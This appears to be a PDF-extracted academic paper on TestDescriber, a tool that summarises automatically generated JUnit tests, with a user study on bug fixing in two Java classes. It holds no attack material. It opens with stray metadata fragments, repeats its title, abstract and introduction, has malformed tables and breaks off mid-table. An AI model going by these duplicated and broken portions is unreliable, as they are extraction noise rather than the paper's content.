[12507, 14848, null], [14848, 16448, null], [16448, 17906, null], [17906, 18844, null], [18844, 19788, null], [19788, 21045, null], [21045, 22242, null], [22242, 23755, null], [23755, 25315, null], [25315, 26536, null], [26536, 27543, null], [27543, 28699, null], [28699, 30186, null], [30186, 32235, null], [32235, 33473, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 33473, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 33473, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 33473, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 33473, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 33473, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 33473, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 33473, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 33473, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 33473, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 33473, null]], "pdf_page_numbers": [[0, 1604, 1], [1604, 3172, 2], [3172, 4663, 3], [4663, 5981, 4], [5981, 6959, 5], [6959, 7227, 6], [7227, 8701, 7], [8701, 10089, 8], [10089, 10625, 9], [10625, 11348, 10], [11348, 12507, 11], [12507, 14848, 12], [14848, 16448, 13], [16448, 17906, 14], [17906, 18844, 15], [18844, 19788, 16], [19788, 21045, 17], [21045, 22242, 18], [22242, 23755, 19], [23755, 25315, 20], [25315, 26536, 21], [26536, 27543, 22], [27543, 28699, 23], [28699, 30186, 24], [30186, 32235, 25], [32235, 33473, 26]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 33473, 0.20506]]}
|
olmocr_science_pdfs
|
2024-12-07
|
2024-12-07
|
7eccf030a673b3db8b932f6e4570a2f79dbfdcf3
|
The Impact of Test Case Summaries on Bug Fixing Performance: An Empirical Investigation
Sebastiano Panichella, Annibale Panichella, Moritz Beller, Andy Zaidman, Harald C. Gall
1 University of Zürich, Switzerland
2 Delft University of Technology, The Netherlands
panichella@ifi.uzh.ch (a.panichella, m.m.beller, a.e.zaidman)@tudelft.nl gall@ifi.uzh.ch
ABSTRACT
Automated test generation tools have been widely investigated with the goal of reducing the cost of testing activities. However, generated tests have been shown not to help developers in detecting and finding more bugs even though they reach higher structural coverage compared to manual testing. The main reason is that generated tests are difficult to understand and maintain. Our paper proposes an approach, coined TestDescriber, which automatically generates test case summaries of the portion of code exercised by each individual test, thereby improving understandability. We argue that this approach can complement the current techniques around automated unit test generation or search-based techniques designed to generate a possibly minimal set of test cases. In evaluating our approach we found that (1) developers find twice as many bugs, and (2) test case summaries significantly improve the comprehensibility of test cases, which is considered particularly useful by developers.
Categories and Subject Descriptors
D.2.5 [Software Engineering]: Testing and Debugging—Code Inspections and Walk-throughs, Testing Tools;
D.2.7 [Software Engineering]: Distribution, Maintenance, and Enhancement—Documentation, Enhancement
Keywords
Software testing, Test Case Summarization, Empirical Study
1. INTRODUCTION
Software testing is a key activity of software development and software quality assurance in particular. However, it is also expensive, with overall testing consuming as much as 50% of overall project effort [8, 36], and programmers spending a quarter of their work time on developer testing [6].
Several search-based techniques and tools [16, 21, 40] have been proposed to reduce the time developers need to spend on testing by automatically generating a (possibly minimal) set of test cases with respect to a specific test coverage criterion [11, 21, 25, 28, 41, 43, 51, 54]. These research efforts produced important results: automated test case generation allows developers to (i) reduce the time and cost of the testing process [5, 11, 13, 54]; to (ii) achieve higher code coverage when compared to the coverage obtained through manual testing [10, 22, 41, 43, 51]; to (iii) find violations of automated oracles (e.g. undeclared exceptions) [16, 22, 35, 40].
Despite these undisputed advances, creating test cases manually is still prevalent in software development. This is partially due to the fact that professional developers perceive generated test cases as hard to understand and difficult to maintain [18, 44]. Indeed, a recent study [23, 24] reported that developers spend up to 50% of their time in understanding and analyzing the output of automatic tools. As a consequence, automatically generated tests do not improve the ability of developers to detect faults when compared to manual testing [12, 23, 24]. Recent research has challenged the assumption that structural coverage is the only goal to optimize [1, 56], showing that when systematically improving the readability of the code composing the generated tests, developers tend to prefer the improved tests and were able to perform maintenance tasks in less time (about 14%) and at the same level of accuracy [18]. However, there is no empirical evidence that such readability improvements produce tangible results in terms of the number of bugs actually found by developers.
This paper builds on the finding that readability of test cases is a key factor to optimize in the context of automated test generation. However, we conjecture that the quality of the code composing the generated test cases (e.g., input parameters, assertions, etc.) is not the only factor affecting their comprehensibility. For example, consider the unit test test0
The Impact of Test Case Summaries on Bug Fixing Performance: An Empirical Investigation
Sebastiano Panichella, Annibale Panichella, Moritz Beller, Andy Zaidman, Harald C. Gall
1 University of Zürich, Switzerland
2 Delft University of Technology, The Netherlands
panichella@ifi.uzh.ch (a.panichella, m.m.beller, a.e.zaidman)@tudelft.nl gall@ifi.uzh.ch
ABSTRACT
Automated test generation tools have been widely investigated with the goal of reducing the cost of testing activities. However, generated tests have been shown not to help developers in detecting and finding more bugs even though they reach higher structural coverage compared to manual testing. The main reason is that generated tests are difficult to understand and maintain. Our paper proposes an approach, coined TestDescriber, which automatically generates test case summaries of the portion of code exercised by each individual test, thereby improving understandability. We argue that this approach can complement the current techniques around automated unit test generation or search-based techniques designed to generate a possibly minimal set of test cases. In evaluating our approach we found that (1) developers find twice as many bugs, and (2) test case summaries significantly improve the comprehensibility of test cases, which is considered particularly useful by developers.
Categories and Subject Descriptors
D.2.5 [Software Engineering]: Testing and Debugging—Code Inspections and Walk-throughs, Testing Tools;
D.2.7 [Software Engineering]: Distribution, Maintenance, and Enhancement—Documentation, Enhancement
Keywords
Software testing, Test Case Summarization, Empirical Study
1. INTRODUCTION
Software testing is a key activity of software development and software quality assurance in particular. However, it is also expensive, with overall testing consuming as much as 50% of overall project effort [8, 36], and programmers spending a quarter of their work time on developer testing [6].
Several search-based techniques and tools [16, 21, 40] have been proposed to reduce the time developers need to spend on testing by automatically generating a (possibly minimal) set of test cases with respect to a specific test coverage criterion [11, 21, 25, 28, 41, 43, 51, 54]. These research efforts produced important results: automated test case generation allows developers to (i) reduce the time and cost of the testing process [5, 11, 13, 54]; to (ii) achieve higher code coverage when compared to the coverage obtained through manual testing [10, 22, 41, 43, 51]; to (iii) find violations of automated oracles (e.g. undeclared exceptions) [16, 22, 35, 40].
Despite these undisputed advances, creating test cases manually is still prevalent in software development. This is partially due to the fact that professional developers perceive generated test cases as hard to understand and difficult to maintain [18, 44]. Indeed, a recent study [23, 24] reported that developers spend up to 50% of their time in understanding and analyzing the output of automatic tools. As a consequence, automatically generated tests do not improve the ability of developers to detect faults when compared to manual testing [12, 23, 24]. Recent research has challenged the assumption that structural coverage is the only goal to optimize [1, 56], showing that when systematically improving the readability of the code composing the generated tests, developers tend to prefer the improved tests and were able to perform maintenance tasks in less time (about 14%) and at the same level of accuracy [18]. However, there is no empirical evidence that such readability improvements produce tangible results in terms of the number of bugs actually found by developers.
This paper builds on the finding that readability of test cases is a key factor to optimize in the context of automated test generation. However, we conjecture that the quality of the code composing the generated test cases (e.g., input parameters, assertions, etc.) is not the only factor affecting their comprehensibility. For example, consider the unit test test0 in Figure 1, which was automatically generated for the target class Option2. From a bird’s-eye view, the code of the test is pretty short and simple: it contains a constructor and two assertions calling get methods. However, it is difficult to tell, without reading the contents of the target class, (i) what is the behavior under test, (ii) whether the generated assertions are correct, (iii) which if-conditions are eventually traversed when executing the test (coverage). Thus, we need a solution that helps developers to quickly understand both tests and code covered.
Paper contribution. To handle this problem, our paper proposes an approach, coined TestDescriber, which is designed to automatically generate summaries of the portion of code exercised by each individual test case to pro-
1The test case has been generated using Evosuite [21].
2The class Option has been extracted from the apache commons library.
2. THE TESTDESCRIBER APPROACH
This section details the TestDescriber approach.
2.1 Approach Overview
Figure 2 depicts the proposed TestDescriber approach, which is designed to generate automatically summaries for test cases leveraging (i) structural coverage information and (ii) existing approaches on code summarization. In particular, TestDescriber generates summaries for the portion of code exercised by each individual test case, thus, providing a dynamic view of the code under test. We notice that unlike TestDescriber, existing approaches on code summarization [19, 20, 34, 37, 48] generate static summaries of source code without taking into account which part of the code is exercised during test case execution. Our approach consists of four steps: (1) Test Case Generation, (2) Test Coverage Analysis, (3) Summary Generation, and (4) Summary Aggregation. In the first step, namely Test Case Generation, we generate test cases using Evosuite [21]. In the second step Test Coverage Analysis, TestDescriber identifies the code exercised by each individual test case generated in the previous step. To detect the executed lines of code we rely on Cobertura\(^4\) a tool based on jcoverage\(^5\). The goal of this step is to collect the information that will be summarized in the next steps, such as the list of statements tested by each test case, the used class attributes, the used parameters and the covered conditional statements etc. During the step Summary Generation, TestDescriber takes the collected information and generates a set of summaries at different levels of granularity: (i) a global description of the class under test, (ii) a global description of each test case, (iii) a set of fine-grained descriptions of each test case (describing for example statements and/or branch executed by the test case). Finally, during the Summary Aggregation step the extracted information and/or descriptions are added to the original test suite. An example of tests summaries generated by TestDescriber, for the test case showed in Figure 1, which tests the Java Class Option of the system Apache Commons CLI\(^6\), can be found in Figure 3. The complete example of generated test suite for such class is available online\(^7\).
2.2 Test Suite Generation
Researchers have proposed several methods capable of automatically generating test input based on the source code of the program under test based on different search strategies, such as genetic algorithms [21, 41], symbolic execution [10], etc. Among them, we have selected Evosuite [21], a tool that automatically generates JUnit test cases with JUnit assertions for classes written in Java code. Internally, Evosuite uses a genetic algorithm to evolve candidate test suites (individuals) according to the chosen coverage criterion where the search is guided by a fitness function [21], which considers all the test targets (e.g., branches, statements, etc.) at the same time. In order to make the test cases produced more concise and understandable, at the end of the search process the best test suite is post-processed to reduce its size while preserving the maximum coverage achieved. The final step of this post-processing consists of adding test assertions, i.e., statements that check the outcome of the test code. These assertions are generated using a mutation-based heuristic [25], which adds all possible assertions and then selects the minimal subset of those able to reveal mutants injected in the code. Consequently, the final test suite serves
\(^{4}\)http://cobertura.github.io/cobertura/
\(^{5}\)http://java-source.net/open-source/code-coverage/jcoverage-gpl
\(^{6}\)https://commons.apache.org/proper/commons-cli/
\(^{7}\)http://www.if.uzh.ch/seal/people/panichella/TestOption.txt
as starting point for a tester, who has to manually revise the assertions. It is important to note that the use of EvoSuite is not mandatory in this phase of the TestDescriber, indeed, it is possible to rely on other existing tools such as Randoop to generate test cases. However, we select EvoSuite since (1) it generates minimal test cases with the minimal set of test assertions reaching high structural coverage [23, 24] and (2) it reached top-2 in last 3 SBST tool competitions.
2.3 Test Coverage Analysis
Once the test cases are generated, TestDescriber relies on Cobertura, to find out which statements and branches are tested by each individual test case. However, with the aim at generating tests summaries for the covered information we need more fine-grained information regarding the code elements composing each covered statement, such as attributes, method calls, the conditions delimiting the traversed branches, etc. In the next step TestDescriber extracts keywords from the identifier names of such code elements, to build the main textual corpus required for generating the coverage summaries. Therefore, on top of Cobertura we built a parser based on JavaParser to collect the following information after the execution of each test case: (i) the list of attributes and methods of the CUT directly or indirectly invoked by the test case; (ii) for each invoked method our parser collects all the statements executed, the attributes/variables used and calls to other methods of the CUT; (iii) the Boolean values of branch decisions in the if-statements to derive which conditions are verified when covering a specific true/false branch of the CUT. The output of this phase is represented by the list of fine-grained code elements and the lines of code covered by each test case.
2.4 Summary Generation
The goal of this step is to provide to the software developer a higher-level view of which portion of the CUT each test case is going to test. To generate this view, TestDescriber extracts natural language phrases from the underlying covered statements by implementing the well known Software Word Usage Model (SWUM) proposed by Hill et al. [30]. The basic idea of SWUM is that actions, themes, and any secondary arguments can be derived from an arbitrary portion of code by making assumptions about different Java naming conventions, and using these assumptions to link linguistic information to programming language structure and semantics. Indeed, method signatures (including class name, method name, type, and formal parameters) and field signatures (including class name, type, and field name) usually contain verbs, nouns, and prepositional phrases that can be expanded in order to generate readable natural language sentences. For example, verbs in method names are considered by SWUM as the actions while the theme (i.e., subjects and objects) can be found in the rest of the name, the formal parameters, and then the class name.
Pre-processing. Before identifying the linguistic elements composing the covered statements of the CUT, we split the identifier names into component terms using the Java camel case convention [30, 48], which splits words based on capital letters, underscores, and numbers. Then, we expand abbreviations in identifiers and type names using both (i) an external dictionary of common short forms for English words [45] and (ii) a more sophisticated technique called contextual-based expansion [29], that searches the most appropriate expansion for a given abbreviation (contained in class and method identifiers).
Part-of-speech tagging. Once the main terms are extracted from the identifier names, TestDescriber uses LanguageTool, a Part-of-speech (POS) tagger to derive which terms are verbs (actions), nouns (themes) and adjectives. Specifically, LanguageTool is an open-source Java library that provides a plethora of linguistic tools (e.g., spell checker, POS tagger, translator, etc.) for more than 20 different languages. The output of the POS tagging is then used to determine whether the names (of method or attribute) should be treated as Noun Phrases (NP), Verb Phrases (VP), and Prepositional Phrases (PP) [30]. According to the type of phrase, we used a set of heuristics similar to the ones used by Hill et al. [30] and Sridhara et al. [48] to generate natural language sentences using the pre-processed and POS tagged variables, attributes and signature methods.
Summary Generation. Starting from the noun, verb and prepositional phrases, TestDescriber applies a template-based strategy [34, 48] to generate summaries. This strategy consists of using pre-defined templates of natural language sentences that are filled with the output of SWUM, i.e., the pre-processed and tagged source code elements in covered statements. TestDescriber creates three different types of summaries at different levels of abstractions: (i) a general description of the CUT, which is generated during a specific sub-step of the Summary Generation called Class Level Summarization; (ii) a brief summary of the structural code coverage scores achieved by each individual JUnit test method; (iii) a fine grained description of the statement composing each JUnit test method in order to describe the flow of operations performed to test the CUT. These fine-grained descriptions are generated during two different sub-steps of the Summary Generation: the Fine-grained Statements Summarization and the Branch Covered Summarization. The first sub-step provides a summary for the statements in the JUnit test methods, while the latter describes the if-statements traversed in the executed path of the CUT.
Class Level Summarization. The focus of this step is to give to a tester a quick idea of the responsibility of the class under test. The generated summary is especially useful when the class under test is not well commented/documented. To this end we implemented an approach similar to the one proposed by Moreno et al. in [37] for summarizing Java classes. Specifically, Moreno et al. defined a heuristics based approach for describing the class behavior based on the most relevant methods, the superclass and class interfaces, and the role of the class within the system. Differently, during the Class Level Summarization we focus on the single CUT by considering only its interface and its attributes, while a more detailed description of its methods and its behaviour is constructed later during the sub-step Fine-grained Statements Summarization. Specifically, during this sub-step are considered only the lines executed by each test case using the coverage information as base data to describe the CUT behavior. Figure 3 shows an example of summary (in orange) generated during the Class Level Summarization phase for the class Option.java. With this summary the developer has the possibility to have a quick understanding of the CUT.
without reading all of its lines of code.
**Test Method Summarization.** This step is responsible for generating a general description of the statement coverage scores achieved by each JUnit test method. This description is extracted by leveraging the coverage information provided by Cobertura to fill a pre-defined *template*. An example of summary generated by TestDescriber for describing the coverage score is depicted in Figure 3 (in yellow): before each JUnit test method (*test0* in the example) TestDescriber adds a comment regarding the percentage of statements covered by the given test method independently from all the other test methods in *TestOption*. This type of description aims to identify the contribution of each test method to the final structural coverage score. In the future we plan to complement the statement coverage describing further coverage criteria (e.g. branch or mutation coverage).
**Fine-grained Statement Summarization.** As described in Section 2.3 TestDescriber extracts the fine-grained list of *code elements* (e.g. methods, attributes, local variables) composing each statement of the CUT covered by each JUnit test method. This information is provided as input to the Fine-grained Statements Summarization phase, thus, TestDescriber performs the following three steps: (i) parses all the instructions contained in a test method; (ii) it uses the SWUM methodology for each instruction and determines which kind of operation the considered statement is performing (e.g. if it declares a variable, it uses a constructor/method of the class, it uses specific assertions etc.) and which part of the code is executed; and (iii) it generates a set of customized natural-language sentences depending on the selected kind of instructions. To perform the first two steps, it assigns each statement to one of the following categories:
- **Constructor of the class.** A constructor typically implies the instantiation of an object, which is the implicit *action/verb*, with some properties (parameters).
In this case, our descriptor links the constructor call to its corresponding declaration in the CUT to map formal and actual parameters. Therefore, pre-processing and POS tagger are performed to identify the verb, noun phrase and adjectives from the constructor signature. These linguistic elements are then used to fill specific natural language templates for constructors.
- **Method calls.** A method implements an operation and typically begins with a verb [30] which defines the main *action* while the method caller and the parameters determine *theme* and *secondary arguments*. Again, the linguistic elements identified after pre-processing and POS tagging are used to fill natural language templates specific for method calls. More precisely, the summarizer is able to notice if the result of a method call is assigned as value to a local variable (assignment statement), thus, it adapts the description depending on the specific context. For particular methods, such as getters and setters, it uses ad-hoc templates that differ from the templates used for more general methods.
- **Assertion statements.** This step defines the test oracle and enables to test whether the CUT behaves as intended. In this case the name of an assertion method (e.g. `assertEquals`, `assertFalse`, `notEquals` etc) defines the type of test, while the input parameters represent respectively (i) the expected and (ii) the actual behavior. Therefore, the template for an assertion statement is defined by the (pre-processed) assertion name itself and the value(s) passed (and verified) as parameter(s) to the assertion. Figure 3 reports two examples of descriptions generated for assertion methods where one of the input parameters is a method call, e.g., `getKey()` (the summary is reported in line 23 and highlighted in green).

**Branch Coverage Summarization.** When a test method contains method/constructor calls, it is common that the test execution covers some if-conditions (branches) in the body of the called method/constructor. Thus, TestDescriber, after the Fine-grained Statements Summarization step, enriches the standard method call description with a summary describing the Boolean expressions of the if condition. Therefore, during the Branch Coverage Summarization step TestDescriber generates a natural language description for the tested if condition. When an if condition is composed of multiple Boolean expressions combined via Boolean operators, we generate natural language sentences for the individual expressions and combine them. Thus, during the Branch Coverage Summarization, we adapt the descriptions when an if-condition contains calls to other methods of the CUT. In the previous example reported in Figure 3, when executing the method call `getKey()` (line 27) for the object `option0`, the test method `test0` covers the false branch of the if-condition if (`opt == null`), i.e., it verifies that `option0` is not `null`. In Figure 3 the lines 24, 25 and 26, (highlighted in red) represent the summary generated during the Branch Coverage Summarization for the method call `getKey()`.
### 2.5 Summary Aggregation
The Information Aggregator is in charge of enriching the original JUnit test class with all the natural language summaries and descriptions provided by the summary generator. The summaries are presented as different block and inline comments: (i) the general description of the CUT is added as a block comment before the declaration of the test class; (ii) the brief summaries of the statement coverage scores achieved by each individual JUnit test method is added as
block comments before the corresponding test method body; (iii) the fine-grained descriptions are inserted inside each test method as inline comments to the corresponding statements they are summarizing.
3. STUDY DESIGN AND PLANNING
3.1 Study Definition
The goal of our study is to investigate to what extent the summaries generated by TestDescriber improve the comprehensibility of automatically generated JUnit test cases and impact the ability of developers to fix bugs. We measure such an impact in the context of a testing scenario in which a Java class has been developed and must be tested using generated test cases with the purpose of identifying and fixing bugs (if any) in the code. The quality focus concerns the understandability of automatically generated test cases when enriched with summaries compared to test cases without summaries. The perspective is of researchers interested in evaluating the effectiveness of automatic approaches for the test case summarization when applied in a practical testing and bug fixing scenario. We therefore designed our study to answer the following research questions (RQs):
RQ1 How do test case summaries impact the number of bugs fixed by developers? Our first objective is to verify whether developers are able to identify and fixing more faults when relying on automatically test cases enriched with summaries.
RQ2 How do test case summaries impact developers to change test cases in terms of structural and mutation coverage? The aim is assessing whether developers are more prone to change test cases to improve their structural coverage when the summaries are available.
3.2 Study Context
The context of our study consists of (i) objects, i.e., Java classes extracted from two Java open-source projects, and (ii) participants testing the selected objects, i.e., professional developers, researchers and students from the University of Zurich and the Delft University of Technology. Specifically, the object systems are Apache Commons Primitives and Math4J that have been used in previous studies on search-based software testing [23, 24, 44]. From these projects, we selected two Java classes: (i) Rational that implements a rational number, and (ii) ArrayIntList, which implements a list of primitive int values using an array. Table 1 details characteristics of the classes used in the experiment. eLOC counts the effective lines of source code, i.e., source lines without purely comments, braces and blanks [33]. For each class we consider a faulty version with five injected faults available from previous studies [23, 24]. These faults were generated using a mutation analysis tool, which selected the five mutants (faults) more difficult to kill, i.e., the ones that can be detected by the lowest number of test cases [23, 24]. These classes are non-trivial, yet feasible to test within an hour; they do not require (i) to learn complex algorithms and (ii) to examine other classes in the same library [23].
To recruit participants we sent email invitations to our contacts from industrial partners as well as to students and researchers from the Department of Computer Science at the University of Zurich and at Delft University of Technology. In total we sent out 44 invitations (12 developers and 32 researchers). In the end, 30 subjects (67%) performed the experiment and sent their data back, see Table 2. Of them, 7 were professional developers from industry and 23 were students or senior researchers from the authors’ Computer Science Departments. All of the 7 professional developers have more than seven years of programming experience in Java (one of them more than 15 years). Among the 23 subjects from our departments, 2 were Bachelor’s students, 5 were Master’s students, 14 PhD students, and 2 senior researchers. Each participant had at least three years of prior experience with Java and the JUnit testing framework.
3.3 Experimental Procedure
The experiment was executed offline, i.e., participants received the experimental material via an online Survey platform\footnote{http://www.esurveyspro.com} that we use to collect and to monitor time and activities. An example of survey sent to the participants can be found online\footnote{http://www.ifi.uzh.ch/seal/people/panicella/tools/TestDescriber/Survey.pdf}. Each participant received an experiment package, consisting of (i) a statement of consent, (ii) a pre-test questionnaire, (iii) instructions and materials to perform the experiment, and (iv) a post-test questionnaire. Before the study, we explained to participants what we expected them to do during the experiment: they were asked to perform two testing sessions, one for each faulty Java class. They could use the test suite (i.e., JUnit test cases) generated by Evosuite to test the given classes and to fix the injected bugs. Each participant received two tasks: (i) one task included one Java class to test plus the corresponding generated JUnit test cases enriched WITH the summaries generated by TestDescriber; (ii) the second task consisted of a second Java class to test together with the corresponding generated JUnit test cases WITHOUT summaries.
The experimental material was prepared to avoid learning effects: each participant received two different Java classes for the two testing tasks; each participant received for the first task test cases enriched with corresponding summaries, while for the second task they received the cases without the summaries. We assigned the tasks to the participants in order to have a balanced number of participants which test (i) the first class with summaries followed by the second class without summaries; and (ii) the first class without summary followed by the second class with summaries. Since Evosuite uses randomized search algorithms (i.e., each run generates a different set of test cases with different input parameters), we provided to each participant different starting test cases.
Before starting the experiment, each participant was asked to fill in the pre-study questionnaire reporting their programming and testing experience. After filling in the questionnaire, they could start the first testing task by opening
| Table 1: Java classes used as objects of our study |
|-----------------|----------|---------|---------|
| Project | Class | eLOC | Methods | Branches |
| Commons Primitives | ArrayIntList | 65 | 12 | 28 |
| Math4J | Rational | 64 | 10 | 25 |
| Table 2: Experience of Participants |
|-----------------|---------|---------|
| Programming Experience | Absolute # | Frequency |
| 1-2 years | 1 | 3.3% |
| 3-6 years | 20 | 66.6% |
| 7-10 years | 8 | 26.6% |
| >10 years | 1 | 3.3% |
| Σ | 30 | 100% |
the provided workspace in the Eclipse IDE. The stated goals were (i) to test the target class as much as possible, and (ii) to fix the bugs. Clearly, we did not reveal to the participants where the bugs were injected, nor the number of bugs injected in each class. In the instructions we accurately explain that the generated JUnit test cases are green since Evosuite, as well as other modern test generation tools [16, 40], generate assertions that reflect the current behavior of the class [21]. Consequently, if the current behavior is faulty, the assertions reflect the incorrect behavior and, thus, must be checked and eventually corrected [23].
Therefore, participants were asked to start reading the available test suite, and to edit the test cases to (eventually) correct the assertions. They were also instructed to add new tests if they think that some parts of the target classes are not tested, as well as to delete tests they did not understand or like. In each testing session, participants were instructed to spend no more than 45 minutes for completing each task and to finish earlier if and only if (i) they believe that their test cases cover all the code and (ii) the found and fixed all the bugs. Following the experiment, subjects were required to fill in an exit survey we used for qualitative analysis and to collect feedback. In total, the duration of the experiment was two hours including completing the two tasks and filling in the pre-test and post-test questionnaires.
We want to highlight that we did not reveal to the participants the real goal of our study, which is to measure the impact of test case summaries on their ability to fix bugs. As well as we did not explain them that they received two different tasks one with and the other one without summaries. Even in the email invitations we use to recruit participants, we did not provide any detail to our goal but we used a more general motivation, which was to better understand the bug fixing practice of developers during their testing activities when relying on generated test cases.
3.4 Research Method
At the end of the experiment, each participant produced two artifacts for each task: (i) the test suite automatically generated by Evosuite, with possible fixes or edits by the participants, e.g., adding assertions to reveal faults; and (ii) the original (fixed) target class, i.e., without (some of) the injected bugs. We analyze the target classes provided by the participants in order to answer RQ1: for each class we inspect the modifications applied by each participant in order to verify whether the modifications are correct (true bug fixing) or not. Thus, we counted the exact number of seeded bugs fixed by each participant to determine to what extent test summaries impact their bug fixing ability.
For RQ2 we computed several structural coverage metrics for each test suite produced when executed on the original classes, i.e., on the target classes without bugs [23, 24]. Specifically, we use Cobertura to collect statement, branch, and method coverage scores achieved. The mutation score was computed by executing the JUnit test suite using PIT\(^\text{13}\), a popular command line tool that automatically seeds a Java code generating mutants. Then, it runs the available tests and computes the resulting mutation score, i.e., the percentage of mutants detected by the test suites. As typical in mutation testing, a mutant is killed (covered) if the tests fail, otherwise if the tests pass then the mutation is not covered.
Once we have collected all the data, we used statistical tests to verify whether there is a statistical significant difference between the scores (e.g., the number of fixed bugs) achieved by participants when relying on tests with and without summaries. We employed non-parametric tests since the Shapiro-Wilk test revealed that neither the number of detected bugs, nor the coverage or mutation measures follow a normal distribution ($p \ll 0.01$). Hence, we used the non-parametric Wilcoxon Rank Sum test with a $p$-value threshold of 0.05. Significant $p$-values indicate that there is a statistical significant difference between the scores (e.g., number of fixed bugs) achieved by the two groups, i.e., by participants using test cases with and without summaries. In addition, we computed the effect-size of the observed differences using the Vargha-Delaney ($\hat{A}_{12}$) statistic [52]. The Vargha-Delaney ($\hat{A}_{12}$) statistic also classifies the obtained effect size values into four different levels (negligible, small, medium and large) that are easier to interpret. We also checked whether other co-factors, such as the programming experience, interact with the main treatment (test summaries) on the dependent variable (number of bugs fixed). This was done using a two-way permutation test [4], which is a non-parametric equivalent of the two-way Analysis of Variance (ANOVA). We set the number of iterations of the permutation test procedure to 1,000,000 to ensure that results did not vary over multiple executions of the procedure [4].
Parameter Configuration. There are several parameters that control the performance in terms of structural coverage for Evosuite; in addition, there are different coverage criteria to optimize when generating test cases. We adopted the default parameter settings used by Evosuite [21], since a previous empirical study demonstrated [2] that the default values widely used in the literature give reasonably acceptable results. For the coverage criterion, we consider the default criterion, which is branch coverage, again similar to previous experiments [23, 24]. The only parameter that we changed is the running time: we run Evosuite for ten minutes in order to achieve the maximum branch coverage.
4. RESULTS
In the following, we report results of our study, with the aim of answering the research questions formulated in Section 3.
4.1 RQ1: Bug Fixing
Figure 4 depicts the box-plots of the number of bugs fixed by the participants, divided into the (i) target classes to fix and (ii) the availability of TestDescriber-generated summaries. The results indicate that for both tasks the number
\[^{13}\text{http://pitest.org/}\]
of bugs fixed is substantially higher when to the participants had test summaries at their disposal. Specifically, from Figure 4 we can observe that for the class ArrayIntList participants without TestDescriber summaries were able to correctly identify and fix 2 out of 5 bugs (median value; 40% of injected bugs) and no participant was able to fix all the injected bugs. Vice versa, when we provided to the participants the TestDescriber summaries, the median number of bugs fixed is 3 bugs and about 30% of the the participants were able to fix all the bugs. This result represents an important improvement (+50% of bugs were fixed by participants) if we consider that in both the scenarios, WITH and WITHOUT summaries, the amount of time given to the participants was the same. Similarly, for Rational, when relying on test cases with summaries, the median number of bugs fixed is 4 out of 5 (80%) and 31% of participants were able to fix all the bugs. Vice versa, using test cases without summaries the participants fixed 2 bugs (median value). Hence, when using the summaries the participants were able to fix twice as many number of bugs (+100%) with respect to the scenario in which they were provided test cases without comments.
The results of the Wilcoxon test highlight that the use of TestDescriber summaries significantly improved the bug fixing performance of the participants in each target class achieving p-values of 0.014 and < 0.01 for ArrayIntList and Rational respectively (which are smaller than the significance level of 0.05). The Vargha-Delaney $A_{12}$ statistic also reveals that the magnitude of the improvements is large for both target classes: the effect size is 0.76 and 0.78 for ArrayIntList and Rational respectively. Finally, we used the two-way permutation test to check whether the number of fixed bugs between the two groups (test cases with and without summaries) depends on and interacts with the participants’ programming experience, which can be a potential co-factor. The two-way permutation test reveals that (i) the number of bugs fixed is not significantly influenced by the programming experience (p-values $\in$ {0.5736, 0.1372}) and (ii) there is no significant interaction between the programming experience and the presence of test case summaries (p-values $\in$ {0.3865, 0.1351}). This means that all participants benefit from using the TestDescriber summaries, independent of their programming experience.
This finding is particularly interesting if we consider that Fraser et al. [23, 24] reported that there is no statistical difference between the number of bugs detected by developers when performing manual testing or using automatically generated test cases to this aim. Specifically, in our study we included (i) two of the classes Fraser et al. used in their experiments (ArrayIntList and Rational), and for them we (ii) considered the same set of injected bugs and (iii) we generated the test cases using the same tool. In this paper we show that the summaries generated by TestDescriber can significantly help developers in detecting and fixing bugs. However, a larger sample size (i.e., more participants) would be needed to compare the performances of participants when performing manual testing, i.e., when they are not assisted by automatic tools like Evosuite and TestDescriber at all. In summary, we can conclude that
**RQ1** Using automatically generated test case summaries significantly helps developers to identify and fix more bugs.
**4.2 RQ2: Test Case Management**
To answer RQ2, we verify whether there are other measurable features instead of the test case summaries the might have influenced the results of RQ1. To this aim, Tables 3 and 4 summarise the structural coverage scores achieved by the test suite produced by human participants during the experiment. As we can see from Table 3 there is no substantial difference in terms of structural coverage achieved by the test suites produced by participants with and without test case summaries for ArrayIntList. Specifically, method, branch and statement coverage are almost identical. Similar results are achieved for Rational as shown in Table 4: for method, branch and statement coverage there is no difference for the tests produced by participants with and without test summaries. Consequently for both the two classes the p-values provided by the Wilcoxon test are not statistically significant and the effect size is always negligible. We hypothesize that these results can be due to the fact that the original test suite generated by Evosuite, that were used by the participants as starting point to test the target classes, already achieved a very high structural coverage (> 70% in all the cases). Therefore, even if the participants were asked to manage (when needed) the test cases to correct wrong assertions, at the end of the experiment the final coverage was only slightly impacted by these changes.
For the mutation analysis, the mutation scores achieved with the tests produced by the participants seem to be slightly lower when using test summaries (-1% on average) for Array-IntList. However, the Wilcoxon test reveals that this difference is not statistically significant and the Vargha-Delaney $A_{12}$ measure is negligible. For Rational we can notice an improvement in terms of mutation score (+10%) for the tests produced by participants who were provided with test summaries. The Wilcoxon test reveals a marginal statistical significant p-value (0.08) and the Vargha-Delaney $A_{12}$ measures an effect size medium and positive for our test summaries, i.e., participants provided test cases able to kill more mutants when using the test summaries. A replication study with more participants would be need to further investigate whether the mutation score can be positively influenced when using tests summaries.
**Table 3: Statistics for the test suites edited by the participants for ArrayIntList**
<table>
<thead>
<tr>
<th>Variable</th>
<th>Factor</th>
<th>Min</th>
<th>Mean</th>
<th>Max</th>
<th>p-value</th>
<th>$A_{12}$</th>
</tr>
</thead>
<tbody>
<tr>
<td>Method Cov.</td>
<td>With</td>
<td>0.36</td>
<td>0.66</td>
<td>0.86</td>
<td>0.03</td>
<td>-</td>
</tr>
<tr>
<td></td>
<td>Without</td>
